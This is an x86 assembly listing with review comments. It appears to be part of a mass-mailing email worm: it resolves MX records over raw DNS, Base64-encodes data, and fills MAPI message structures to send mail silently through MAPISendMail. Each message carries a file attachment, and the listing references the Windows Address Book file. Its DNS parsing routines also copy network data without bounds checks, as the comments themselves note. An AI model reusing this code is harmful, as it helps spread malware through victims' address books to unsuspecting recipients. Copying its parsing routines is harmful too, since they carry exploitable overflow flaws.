call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 30
call GetDomainName, offset dnsBuffer, edi, offset szQuery2
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset szQueryLabels, 100
call ConnectToHost, offset hSock, offset szQuery2, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
; convert the domain name to labels
call StringToLabels, offset szQuery, offset szQueryLabels
; query the DNS server for a list of MX(mail exchage) records
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_MX, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
; terminate connection
call closesocket, hSock
; get the first email server name in the message
call lstrlenA, offset szQuery
mov edi, offset dnsBuffer
add edi, eax
add edi, 32
call GetDomainName, offset dnsBuffer, edi, offset szSMTP
xor eax, eax
ret
smtpFailure:
call closesocket, hSock
mov eax, -1
ret
GetSmtpDomain ENDP
GetDomainName PROC buf:DWORD, source:DWORD, dest:DWORD
;
; Copy one DNS name out of a received message into a dotted string.
;
;   buf    - start of the DNS message (base address for compression pointers)
;   source - address of the name's first length byte inside that message
;   dest   - output buffer; labels are written separated by '.'
;
; Returns eax = 0 always.  Clobbers esi, edi, ecx (cl), eax and flags.
; Callers pass source as a fixed offset into the message (see the MX
; lookup above), so the first byte is always taken as a label length -
; this routine never checks whether it is a compression pointer.
;
; NOTE(review): nothing here is bounds-checked.  esi walks the message
; and edi writes to dest without any size limit, so the length bytes of
; a reply received from the network decide how much gets copied.  No
; terminating zero is written at the end of dest either; dest must
; already hold a zero after the copied name.
;
mov esi, source
mov edi, dest
mov cl, [esi]                        ; cl = length of the first label
copyLabel:
; do-while: copy cl bytes, then fall through to the next length byte.
; NOTE(review): if cl is 0 on entry, `dec cl` wraps to 0FFh and 256
; bytes are copied.
inc esi
mov al, [esi]
mov [edi], al
inc edi
dec cl
cmp cl, 0
jne copyLabel
inc esi                              ; esi -> next length byte, pointer, or terminator
cmp byte ptr [esi], -64              ; 0C0h: compression pointer (only this exact byte value)
je appendLabel
cmp byte ptr [esi], 0                ; root label: name complete
je domainComplete
mov cl, [esi]                        ; length of the next label
mov byte ptr [edi], '.'              ; label separator
inc edi
jmp copyLabel
domainComplete:
xor eax, eax
ret
appendLabel:
; Follow a compression pointer: the byte after 0C0h is the offset from buf.
; NOTE(review): only that low byte is used, so only offsets 0..255 are
; followed.  A pointer whose first byte is 0C1h..0FFh (offset >= 256) is
; not recognised and is treated as a label of length 193..255, and a
; pointer that leads back to itself loops forever.
xor eax, eax
mov al, [esi+1]
add eax, buf
mov esi, eax
mov cl, [esi]
mov byte ptr [edi], '.'
inc edi
jmp copyLabel
GetDomainName ENDP
QueryDNS PROC sock:DWORD, buf:DWORD, size:DWORD, name:DWORD, type:WORD, class:WORD
;
; Send one DNS question over sock and receive the reply into buf.
;
;   sock  - socket that ConnectToHost has already connect()ed to the
;           server; sendto/recvfrom below pass no address, so this only
;           works on a connected socket
;   buf   - message buffer of size bytes; holds the query, then the reply
;   name  - query name already in label form (see StringToLabels)
;   type  - QTYPE (e.g. DNS_TYPE_MX); class - QCLASS (e.g. DNS_CLASS_IN)
;
; Returns eax = 0 when a reply with a non-zero answer count arrived,
; -1 otherwise.  Clobbers edi, eax and flags.
;
; NOTE(review): the reply is not validated beyond ANCOUNT != 0.  The
; transaction ID is the constant 3 and is not compared on receive, the
; QR/RCODE bits are not inspected, and the byte count returned by
; recvfrom is discarded, so a datagram shorter than the 12-byte header
; or any unrelated datagram arriving on the socket can be accepted as
; an answer.
;
; Create the query header
mov edi, offset buf                  ; NOTE(review): buf is a parameter; every other use
                                     ; below is `mov edi, buf`.  Confirm this assembles
                                     ; to the pointer value rather than the address of
                                     ; the stack slot.
call htons, 3
mov word ptr [edi], ax ; query ID (fixed value 3 for every query)
mov word ptr [edi+2], 0 ; flags: all clear, so RD (recursion desired) is not set
call htons, 1
mov word ptr [edi+4], ax ; question entries (QDCOUNT = 1)
mov word ptr [edi+6], 0 ; answer entries
mov word ptr [edi+8], 0 ; authority entries
mov word ptr [edi+10], 0 ; resource entries
; copy domain name to the buffer (question starts right after the header)
mov eax, buf
add eax, 12
call lstrcpyA, eax, name             ; copies the labels up to and including the 0 terminator
; seek past the domain name: 12 (header) + strlen(name) + 1 (terminator)
call lstrlenA, name
mov edi, buf
add edi, eax
add edi, 13
; write the query type
call htons, type
mov [edi], ax
; write the query class
call htons, class
mov [edi+2], ax
; send the query message to the DNS server
; NOTE(review): a fixed 100 bytes are sent whatever the real query length
; (12 + strlen(name) + 1 + 4) is: an encoded name longer than 83 bytes is
; truncated, and for shorter names the trailing bytes are whatever the
; caller left in buf.  to/tolen are 0, which relies on the connected socket.
call sendto, [sock], buf, 100, 0, 0, 0
cmp eax, -1
je queryFailure
; receive the query response (the byte count in eax is not kept)
call recvfrom, [sock], buf, size, 0, 0, 0
cmp eax, -1
je queryFailure
; check to see if the query got an answer: ANCOUNT word at offset 6
; (byte order is irrelevant for a zero test)
mov edi, buf
cmp word ptr [edi+6], 0
je queryFailure
xor eax, eax
ret
queryFailure:
mov eax, -1
ret
QueryDNS ENDP
StringToLabels PROC source:DWORD, dest:DWORD
;
; Convert a zero-terminated dotted name ("mail.example.com") into DNS
; wire format: each label preceded by its length byte, ending with a
; 0 byte (3 "mail" 7 "example" 3 "com" 0).
;
;   source - input string
;   dest   - output buffer; needs strlen(source) + 2 bytes
;
; Register use: esi = input cursor, edi = output cursor, cl = bytes in
; the current label, edx = address of the current label's length byte
; (patched when the label ends).  Clobbers esi, edi, ecx, edx, eax and
; flags; eax is undefined on return.
;
; NOTE(review): no length checks.  A label longer than 63 bytes is
; written with its full length byte (DNS limits labels to 63, and a
; length >= 192 reads as a compression pointer), and an empty label
; (leading '.' or "..") produces a 0 length byte, which the lstrcpyA
; in QueryDNS treats as the end of the name.
;
mov esi, source
mov edi, dest
inc edi                              ; leave room for the first length byte
xor cl, cl
mov edx, dest                        ; where that length byte will be written
findDot:
cmp byte ptr [esi], '.'
je writeTotal
cmp byte ptr [esi], 0
je convertComplete
mov al, [esi]                        ; copy one character of the current label
mov [edi], al
inc esi
inc edi
inc cl
jmp findDot
convertComplete:
mov byte ptr [edx], cl               ; length of the last label
mov edx, edi
mov byte ptr [edi], 0                ; root label terminates the name
ret
writeTotal:
mov byte ptr [edx], cl               ; patch the length of the label just finished
xor cl, cl
mov edx, edi                         ; the next length byte goes here
inc edi                              ; skip over it
inc esi                              ; skip the '.'
jmp findDot
StringToLabels ENDP
ConnectToHost PROC lpSocket:DWORD, lpHostName:DWORD, port:DWORD, protocol:DWORD
;
; Create an AF_INET socket, resolve lpHostName and connect it to port.
;
;   lpSocket   - address of a DWORD that receives the socket handle
;   lpHostName - zero-terminated name (or address string) for gethostbyname
;   port       - port number in host byte order
;   protocol   - socket type (SOCK_STREAM / SOCK_DGRAM)
;
; Returns eax = 0 on success, -1 on failure (the socket is closed first).
; connect() is issued for SOCK_DGRAM as well; that sets the default peer
; that QueryDNS relies on when it calls sendto/recvfrom with no address.
; Uses the global SockAddress, so it is not re-entrant.  Clobbers ebx
; (not restored, although Win32 callers normally expect ebx to survive
; a call), eax and flags.
;
; Create a socket
call socket, AF_INET, protocol, PCL_NONE
mov ebx, [lpSocket]
mov [ebx], eax                       ; stored even when it is INVALID_SOCKET (-1)
cmp eax, -1
je connFailed
; Create address
mov SockAddress.sin_family, AF_INET
call htons, port
mov SockAddress.sin_port, ax
call gethostbyname, lpHostName
cmp eax, 0
je connFailed
; hostent: [eax+12] presumably h_addr_list; take the first address.
; NOTE(review): the first list entry is dereferenced without a NULL check.
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
mov SockAddress.sin_addr, eax
; connect to address
mov ebx, [lpSocket]
call connect, dword ptr [ebx], offset SockAddress, 16
cmp eax, 0
jne connFailed
; return success code
xor eax, eax
ret
connFailed:
; close the socket (also reached when socket() itself failed, in which
; case closesocket is handed INVALID_SOCKET)
mov ebx, [lpSocket]
call closesocket, dword ptr [ebx]
; return failure code
mov eax, -1
ret
ConnectToHost ENDP
TimeOut PROC sock:DWORD, milliseconds:DWORD
;
; Set the send and receive timeout of sock to milliseconds.
;
; Stores the value in the global IOTimeOut and passes it to setsockopt
; for SO_RCVTIMEO and SO_SNDTIMEO as a 4-byte DWORD.  Neither result is
; checked; eax on return is whatever the second setsockopt returned.
; Clobbers eax and flags.
;
mov eax, milliseconds
mov IOTimeOut, eax
call setsockopt, sock, SOL_SOCKET, SO_RCVTIMEO, offset IOTimeOut, 4
call setsockopt, sock, SOL_SOCKET, SO_SNDTIMEO, offset IOTimeOut, 4
ret
TimeOut ENDP
Base64Encode PROC threeBytes:DWORD, fourBytes:DWORD
;
; Encode one 3-byte group as 4 Base64 characters.
;
;   threeBytes - address of exactly 3 input bytes
;   fourBytes  - address of a 4-byte output buffer (no terminator is
;                added; the buffer is also used as scratch, see below)
;
; The three bytes are stored reversed into fourBytes and read back as a
; dword, so on this little-endian machine eax holds them as the 24-bit
; value b0<<16 | b1<<8 | b2.  The four 6-bit groups are then masked out
; from the top down and mapped to characters by addBase.
;
; Padding is not handled here: a final group of 1 or 2 bytes is the
; caller's problem.  Clobbers esi, edi, eax and flags; eax is undefined
; on return.
;
mov esi, threeBytes
mov edi, fourBytes
; reverse the byte order
mov al, [esi+2]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi]
mov [edi+2], al
mov byte ptr [edi+3], 0
mov eax, [edi]                       ; eax = b0<<16 | b1<<8 | b2
; convert first 6 bits
push eax
and eax, 0FC0000h
shr eax, 18
call addBase
mov [edi], al
pop eax
; convert second 6 bits
push eax
and eax, 3F000h
shr eax, 12
call addBase
mov [edi+1], al
pop eax
; convert third 6 bits
push eax
and eax, 0FC0h
shr eax, 6
call addBase
mov [edi+2], al
pop eax
; convert fourth 6 bits
push eax
and eax, 3Fh
call addBase
mov [edi+3], al
pop eax
ret
addBase:
; Local near routine: map al in 0..63 to its Base64 character in al.
;   0..25 -> 'A'..'Z', 26..51 -> 'a'..'z', 52..61 -> '0'..'9',
;   62 -> '+', 63 -> '/'
; Signed compares are fine because every caller masks al to 6 bits.
; NOTE(review): the `ret 0` forms presumably avoid MASM expanding a plain
; `ret` into this PROC's epilogue (which would return from Base64Encode
; instead of to the call site) - confirm in the listing file.
cmp al, 25
jle add65
cmp al, 51
jle add71
cmp al, 61
jle sub4
cmp al, 62
je mov43
cmp al, 63                           ; no effect: the jmp below is unconditional
jmp mov47
add65: add al, 65                    ; 'A'
ret 0
add71: add al, 71                    ; 26 + 71 = 'a'
ret 0
sub4: sub al, 4                      ; 52 - 4 = '0'
ret 0
mov43: mov al, 43                    ; '+'
ret 0
mov47: mov al, 47                    ; '/'
ret 0
Base64Encode ENDP
mkMail:
; Fill in the MAPI message from the current record and hand it to
; MAPISendMail.  Plain label, reached from code outside this listing;
; returns with eax = MAPISendMail's result, which is not checked here.
;
; recordPosition is used as a pointer to a record with fixed-width
; fields: +0 sender address, +50 subject, +100 body text,
; +200 attachment display name -- TODO confirm against the code that
; builds the record.
mov eax,dword ptr [recordPosition]
mov dword ptr[MsgFrom+8],eax ;msgFrom (originator name field)
add eax,50
mov dword ptr[mmMessage+4],eax ;Subject
add eax,50
mov dword ptr[mmMessage+8],eax ;Message (note text)
add eax,100
mov dword ptr[Attach+10h],eax ;Attach (file display name)
; MAPISendMail(hdMapi, 0, &mmMessage, 0, 0), stdcall: pushed right to left.
; Flags are 0, i.e. no MAPI_DIALOG, so the message is handed to MAPI
; without any user prompt.
xor eax,eax
push eax                             ; ulReserved
push eax                             ; flFlags
push offset mmMessage                ; lpMessage
push eax                             ; ulUIParam
push [hdMapi]                        ; lhSession
call MAPISendMail
ret
szWabook DB 'C:\WABOOK.WAB',0        ; Windows Address Book path; referenced by code outside this listing
szAttach DB 64 DUP(0)                ; path of the file attached to every message (filled in elsewhere)
hdMapi DD 0                          ; MAPI session handle passed to MAPISendMail
; mmMessage: 12 dwords laid out like MAPI's MapiMessage structure.
; The field names below follow that layout; mkMail fills the Subject and
; Message pointers at runtime.
mmMessage DD 0                       ; ulReserved
DD 0 ;Subject (lpszSubject, set by mkMail)
DD 0 ;Message (lpszNoteText, set by mkMail)
DD 0                                 ; lpszMessageType
dd ?                                 ; lpszDateReceived
dd ?                                 ; lpszConversationID
dd 2                                 ; flFlags = 2 (presumably MAPI_RECEIPT_REQUESTED)
dd offset MsgFrom                    ; lpOriginator
dd 1                                 ; nRecipCount: one recipient
dd offset MsgTo                      ; lpRecips
dd 1                                 ; nFileCount: one attachment
dd offset Attach                     ; lpFiles
; MsgFrom / MsgTo: 6 dwords each, laid out like MapiRecipDesc
MsgFrom dd ?                         ; ulReserved
dd ?                                 ; ulRecipClass
dd ? ;MailFrom (lpszName, set by mkMail to the record's sender field)
dd ?                                 ; lpszAddress
dd ?                                 ; ulEIDSize
dd ?                                 ; lpEntryID
MsgTo dd ?                           ; ulReserved
dd 1                                 ; ulRecipClass = 1 (MAPI_TO)
Mail2 dd offset emailAddressASC      ; lpszName: recipient buffer defined outside this listing
dd offset emailAddressASC            ; lpszAddress: same buffer
dd ?                                 ; ulEIDSize
dd ?                                 ; lpEntryID
; Attach: 6 dwords laid out like MapiFileDesc
Attach dd ?                          ; ulReserved
dd ?                                 ; flFlags
dd ?                                 ; nPosition
dd offset szAttach                   ; lpszPathName: the file that gets attached
dd ? ;AttachName (lpszFileName, set by mkMail)
dd ?                                 ; lpFileType
End Main ; End of code